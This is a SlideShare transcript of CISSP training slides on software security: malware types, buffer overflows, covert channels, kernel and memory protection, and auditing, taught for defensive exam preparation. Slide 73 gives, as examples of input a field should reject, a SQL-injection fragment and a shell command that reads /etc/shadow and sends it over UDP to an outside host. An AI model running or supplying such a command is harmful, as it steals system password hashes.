CISSP Week 14
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

CISSP Week 14

on

  • 499 views

 

Statistics

Views

Total Views
499
Views on SlideShare
499
Embed Views
0

Actions

Likes
0
Downloads
95
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as OpenOffice

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

CISSP Week 14 Presentation Transcript

  • 1. Security Issues In Source Control StaridLabs CISSP Training CBK Pages 699-752 Jem Jensen September 07, 2013
  • 2. Jem Is Back!
  • 3. Buffer Overflow ● Program writes data past the end of a memory buffer ● Simplest Example: int i=0; char* array = char[1]; while (true) { array[i++]=0; }
  • 4. Buffer Overflow ● More modern example: ● Fill a parameter with more data than the application expects and can handle ● Excess data gets written past the end of the buffer and into system memory ● NOP (“no-op”) Sled: ● Insert multiple “perform no operation” special characters before the payload to make the exploit more fault-tolerant
  • 5. Citizen/Casual Programmers ● Users who know how to program enough to make their own scripts and programs ● Outside of security controls and monitors ● Probably not trained on the org coding standards and up-to-date security patterns
  • 6. Covert Channel ● Two cooperating processes can transfer information in a way that violates the systems security policies ● Could be intended (an insider is trying to get info out) or unintended (accidental data leaking) ● Storage: 2+ subjects at different security levels share a memory location or disk sector ● Timing: A process can vary its rate of utilization to signal or affect a second process
  • 7. Malformed Input Attacks ● Mask malicious input to trick controls ● Example: Application accepts URLs but firewall blocks malicious ones. So we encode the URL in unicode instead of ASCII so the firewall rule doesn't trigger ● SQL Injection ● XSS ● Buffer Overflows
  • 8. Memory Reuse ● Example: Application asks for a chunk of memory. The OS gives the raw chuck, which still contains whatever data was previously in it from the last application ● Ideally, an OS should zero-out memory before reissuing it
  • 9. Executable Content/Mobile Code/Active Capsule/... ● Code transmitted across a network for local execution ● Example: Email attachments, applets (Java, Active X, Flash) ● Could simply access data it shouldn't or could be full- blown malware
  • 10. Social Engineering ● Getting people to divulge sensitive information through lying or misrepresentation ● Friendly, Aggressive, Intimidation, Bullying ● Scareware – tricks users into thinking they need to run a program to get “safe” again ● Phishing – pretending to be a legitimate site
  • 11. Time of Check/Use ● Race conditions – output is dependent on the sequence/order/timing of events ● Example: ● A user logs into a system ● The user is fired and deactivated from login ● The user is still logged in and can retaliate for being fired!
  • 12. Between-the-lines Attack ● Injecting data into others communications ● Example: Telephone “party lines”
  • 13. Trapdoor/Backdoor ● Hidden mechanism to bypass access control ● Sometimes added for “maintenance” ● Dangerous! Anyone could use it!
  • 14. Malware ● Software intentionally designed to penetrate systems, break security policies, and carry damaging payloads ● Synonymous with “virus” to most people ● Designed to use systems for further assaults ● Very easy to make – use existing malware as a template and package around a new CVE
  • 15. Not Malware ● Excludes bugs – must be intentional ● Excludes toolkits/utilities – malware can initiate and continue attacks with a user directly controlling it
  • 16. Virus ● Copies and disperses itself without knowledge or cooperation of owner/user ● Worm: Special category of virus that requires no user interaction ● May or may not contain a payload
  • 17. Types of Viruses ● File Infectors: Infects/spreads through files ● Boot sector Infectors: Replace boot sector ● System Infectors: Infects OS files so virus runs on boot. Ex: registry, COMMAND.COM ● Companion Virus: Place .COM file in a directory with a .EXE – Windows runs .COM first if it finds one ● Email Virus: Targets specific mail servers, harvests e-mail addresses, and propagates with more e-mails ● Multipartite: Infects more than one type of object ● Macro Virus: Infects templates to run as macros when documents are opened (MS Word, Excel) ● Script Virus: Stand-alone scripts (.VBS, .SH)
  • 18. Worms ● Spread on their own, usually by exploiting vulnerabilities in common software ● LoveLetter – infected e-mail attachments and attached network drives
  • 19. Hoaxes ● Warnings about viruses that do not exist ● E-mail chain letters ● May instruct users to make changes that harm or destroy their systems ● Example: delete this system file if you find it!
  • 20. Trojans ● Pretend to do one thing while performing another unwanted action ● Remote Access Trojans (RAT) ● Used to remotely access/control computer ● Back Orifice, Netbus, Bionet ● Not viral – corrupt self-propagation
  • 21. DDOS Zombies ● Distributed Denial of Service ● A quick history: Old DOS vs newer DDOS ● Virus infects computers with a payload that waits for instructions from a botnet ● When the time is right, all of the infected zombies perform a coordinated attack
  • 22. Logic Bombs ● Triggered only after certain conditions are met ● Example: Starts after a certain date or after a certain employee is fired ● Salami Scam: Siphon off small amounts of money on each transaction
  • 23. Spyware/Adware ● Spyware: Collect information on a user or system ● Adware: Provide advertising to a user, against the user's wishes ● Often “bundled” secretly or stealthily with legitimate software, turning them into trojans
  • 24. Pranks ● Insult user, make sound effects, make computer non-function in some way ● Generally not considered malware if it makes an announcement about its presence
  • 25. Botnets ● A network of automated systems performing a specific, malicious function ● Can be installed via other malware or by choice (LOIC) ● Clients connect to a command & control (C&C) system to retrieve instructions ● C&C could be IRC, P2P, IM, etc
  • 26. Malware Protection ● Training & Guidelines ● Don't open attachments ● Disable Active X, VBScript, etc ● Use multiple scanners & scan everything
  • 27. Scanners ● Looks for signatures of malware ● May or may not repair infections – often just detect and maybe quarantines
  • 28. Heuristic Scanners ● Looks for suspicious code or telltale behaviors
  • 29. Activity Monitors ● Watches for: ● changes to key files ● system resource changes ● attempts to access/alter other programs ● May ask for confirmation of changes
  • 30. Change Detection ● Compares previous versions of files to the latest version ● May use CRC to just detect that a change occurred ● May actually track the changes
  • 31. Antimalware Practices ● Educate regularly ● Review effectiveness ● Monitor activity or telltale signs of infection and malware activity
  • 32. StaridLabs CISSP Training CBK Pages 729-752 Tim Jensen September 07, 2013
  • 33. Software Protection Mechanisms
  • 34. Security Kernels ● The Kernel is the lowest and most important level of an Operating System. ● Basic Purposes (Reference Monitor): ● Completeness: All information flows through the Kernel ● Isolation: Kernel is protected from unauthorized access ● Verifiability: The kernel must be a proven design
  • 35. Remember the last time you saw a Kernel Attacked?
  • 36. Example of Kernel Attacks (#OffTopicTim) ● Kees Cook discovered a format string vulnerability in the Linux kernel's disk block layer. A local user with administrator privileges could exploit this flaw to gain kernel privileges. ● Hannes Frederic Sowa discovered that the Linux kernel's IPv6 stack does not correctly handle Router Advertisement message in some cases. A remote attacker could exploit this flaw to cause a denial of service. ● Windows: ...Vulnerabilities could allow elevation of privilege if an attacker logged on locally and ran a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit these vulnerabilities.
  • 37. Those were just a few of the several dozen disclosed in the last 30 days. Not all are disclosed by OS vendors.
  • 38. Marketing Buzzwords you need to know (because they're on the test) Reference Monitor: A reference monitor concept defines a set of design requirements on a refer-ence validation mechanism, which enforces an access control policy over subjects’ (e.g., processes and users) ability to perform operations (e.g., read and write) on objects (e.g., files and sockets) on a system. – The reference validation mechanism must always be invoked (complete mediation). – The reference validation mechanism must be tamperproof (tamperproof). – The reference validation mechanism must be small enough to be subject to analysis and tests, the completeness of which can be assured (verifiable) Definition from: http://ix.cs.uoregon.edu/~butler/teaching/10F/cis607/papers/jaeger- refmon.pdf
  • 39. Buzzword Bingo ● Security Kernel - the central part of a computer or communications system hardware, firmware, and software that implements the basic security procedures for controlling access to system resources. Definition from: http://en.wikipedia.org/wiki/Security_kernel
  • 40. Marketers <3 Buzzwords ● TCB (Not the Drug): Stands for trusted computing base. TCB contains all elements of a system responsible for supporting security policy and isolating objects. Can be verified using Trusted Computer System Evaluation Criteria (TCSEC) and Common Criteria (CC).
  • 41. Processor Privilege States ● Privilege states protect eh processor and activcities that it performs. ● Generally hardware controlled ● Intended to protect memory access from less privileged to more privileged levels (If implemented correctly) ● Many Operating Systems have two processor access modes: User and Kernel mode
  • 42. Kernel Mode ● Allows access to all system memory, resources, and all CPU instructions. ● Applications should run in user mode to protect resources
  • 43. Windows PPS
  • 44. Linux PPS
  • 45. Android PPS
  • 46. Ring Model
  • 47. (Not in CBK): What Rings are actually designed for
  • 48. Security Controls for Buffer Overflows
  • 49. NOP Sled
  • 50. Buffer Overflow ● Improper checking causes memory buffers to overflow and potentially overwrite data for other applications ● Example: Wireless standards state that an SSID can be a max of 32 characters. If an attacker sends an SSID of 34 characters and the victim tries storing it, a buffer overflow could occur if memory was only allocated for 32 characters.
  • 51. Controls for Incomplete parameter checking and enforcement ● Parameter checking: Check for disallowed characters, length, data types, format ● Canary: Memory is reserved between memory spaces and monitored. If any changes occur to the memory space then a buffer overflow occurred and the offending application is either notified, terminated, or blacklisted from execution
  • 52. Canary
  • 53. Memory Protection ● Memory partitioning – Memory must be segregated by process and protected from unauthorized access
  • 54. Memory Protection Methods ● 1. Ensure all system-wide data structures and memory pools used by kernel mode system components can be accessed only while in kernel mode. (See Epic Fails in Windows 95/98 security) ● 2. Each process has a separate, private address space protected from being accessed by any request belonging to another process, with few exceptions.
  • 55. Memory Protection Methods Cont'd ● 3. Most modern processors provide some form of hardware controlled memory protection such as read or write access. Example: page_noaccess ● 4. Access Control Lists should protect shared memory objects and they are checked when processes attempt to open them (vs attempt to overwrite them)
  • 56. Cover Channels ● A covert channel is when two processes are able to transfer information in a way that violates the system's security policy ● Only channels which breach the security policy are of interest ● A covert channel MUST have a shared most have access to a shared resource ● Example: A user process has a memory space shared with a kernel mode process in the kernel process space. The user process could overwrite kernel memory locations and cause intentional or unintentional system damage or data exposure
  • 57. Cryptography – Not just for networking anymore! ● Cryptography can be applied to the whole OS, to database files, etc. ● (It's becoming more common to encrypt pieces of data in memory as well: Such as Using a hash or reversable encryption on a password when holding it in a variable instead of leaving it plaintext)
  • 58. Password Protection Techniques (Does this really have to be in a CISSP booK?) ● Passwords are commonly used to provide authentication and establish access controls to resources. ● Password files are prone to unauthorized access. ● Passwords are commonly hashed to protect them, but hashed password are prone to dictionary attacks. ● Password fields can be masked so passwords can't be ready by shoulder-surfers
  • 59. Inadequate Granularity of Controls ● See Access Control Domain ● Separation of Duties ● Dev/QA/Prod should be split apart
  • 60. Time of Check/Time of Use (TOC/TOU) ● Most common TOC/TOU is file based race condition – occurs when there is the check on some property of the file that proceeds the use of that file. ● Example: In a multi-process application you could have two processes reading/writting to a file. If The file is opened/closed continuously then the file location (inode location) could change. Instead the inode should be looked up and held open during writes from a process so the location doesn't change or a file not found error could occur. Once closed the second process can get a handle on the file for writes and close safely when fully complete.
  • 61. Social Engineering ● Subtle intimidation, bluster, pulling rank, exloiting guilt, pleading, exploiting helpfulness, appealing to underling's subversive streak. ● Activities include: Passowrd Stealing, dumpster diving, spreading malicious misinformation ● Protections: Make users are ware of threats, proper procedures for handling unusual AND normal requests for information
  • 62. Backup Controls ● Operating systems and applications should be backed up in the event of system failure. ● Contingency plans should be in place for prioritization restoration in the event of large scale system outages.
  • 63. Software Forensics ● Analyzing software suspected of being malicious ● Could be source code analysis or compiled code analysis ● Trying to identify: Is it malware, who wrote it, where was it written, what would it affect, what's the malware's intent?
  • 64. Mobile Code Controls ● Attaching programs (javascript, java, flash, activex, vbscript, macros, etc) to transient data (websites, office documents, email, etc) ● (Tim Note: Anything that uses XML or HTML could be succeptable to mobile code attacks. See Transmission Bittorrent Client CVE from last year)
  • 65. Sandbox ● Mobile code can be sandboxed (most of the time) ● Limits are placed on the amount of memory and processor resources the program can consume. If resources go over the alloted amount then the process is terminated and an error logged. ● In Java: Java applications live outside the sandbox and java applets live inside the sandbox
  • 66. Programming Languages ● To increase security a type-safe programming language should be used like Java (The book said it...Page 746...) ● Ensures arrays stay in bounds, pointers are always valid, code cannot be placed in strings and then executed.
  • 67. Configuration Management ● Log changes to source code ● Log changes to configuration settings ● Review changes ● Create Change Plans ● “Any deviation from change plans could change the configuration of the entire system and could essentially void any certification that it is a secure, trusted system.”
  • 68. Information Protection Management ● If software is shared, it should be protected from unauthorized modification.
  • 69. This is getting a bit dry... ● Did you know that at DEFCON there actually is a pool on the roof?
  • 70. Effectiveness of Software Security
  • 71. Certification and Accreditation ● In the United States, federal agencies are mandated to conduct security certification of systems that process, store or transmit information on behalf of the government. Certification is the technical evaluation or assessment of security compliance of the information system within the operational environment. ● Must meet user functional requirements,as well as security requirements.
  • 72. Certification Cont'd ● NIST SP 800-37 is a recommended security authorization process and it's procedures. ● US Government and it's business associates are required: ● To have a certificationa nd accreditation process which sensures a control framework has been selected and is consistently being applied ● If part of the change management program then system authorization process is relatively low overhead ● Security authorization standards mandate the user of standards (standard protocols, operating systems, etc) ● Should include: physical security, training, environment, and interconnections
  • 73. Auditing and Logging ● Information Integrity: Data reconciliation – Totals or check sequence numbers should be compared to make sure the right operations was performed against the right data. ● Information Accuracy: Data validation and verification should be incorporated into applications. If a field should be 1-9 numbers only, the field shouldn't accept any of these: (alienbabbies, 42, drop tables;,cat ../../../../../../../../etc/shadow > /dev/udp/staridlabs.org/1337)
  • 74. Logging Cont'd ● Information Auditing – Scouring logs to find abnormal activities. Disabling or modifying logging should cause a log event/notification.
  • 75. Risk Analysis and Mitigation ● Most vulnerabilities are developed into software at it's inception or as part of changing the software's configuration over time.
  • 76. Risk Mitigation ● Process should be built into SDLC ● Use standardized methods of assessing risk ● Qualitative vs quantitative vs hybrid ● ISO, NIST, ANSI, ISACA frameworks ● Should be comprehensive in risk and focus, not just on technology but on operational and managerial controls ● Track and manage weaknesses discovered during assessment
  • 77. Corrective Actions ● Vulnerability findings must be reviewed and prioritized. ● ***Not all findings need to be mitigated*** ● Stats that reduce screaming in meetings: ● The finding and details of how it was discovered ● How was risk determined and what is the threat, likelihood, and impact ● Remediation cost and what the impact of remediation will be ● Cost of not fixing it (reputation, compliance, fines, being sued, etc)
  • 78. Testing and Verification ● Mitigations need to be tested after they are implemented (Make sure to have reproducible steps before mitigating so you can be sure it's fixed!!!) ● Development teams should not be doing the validation. Once they say it's fixed the vulnerability should be re-assessed by security or an independent party. **A note on this not being a slight against developers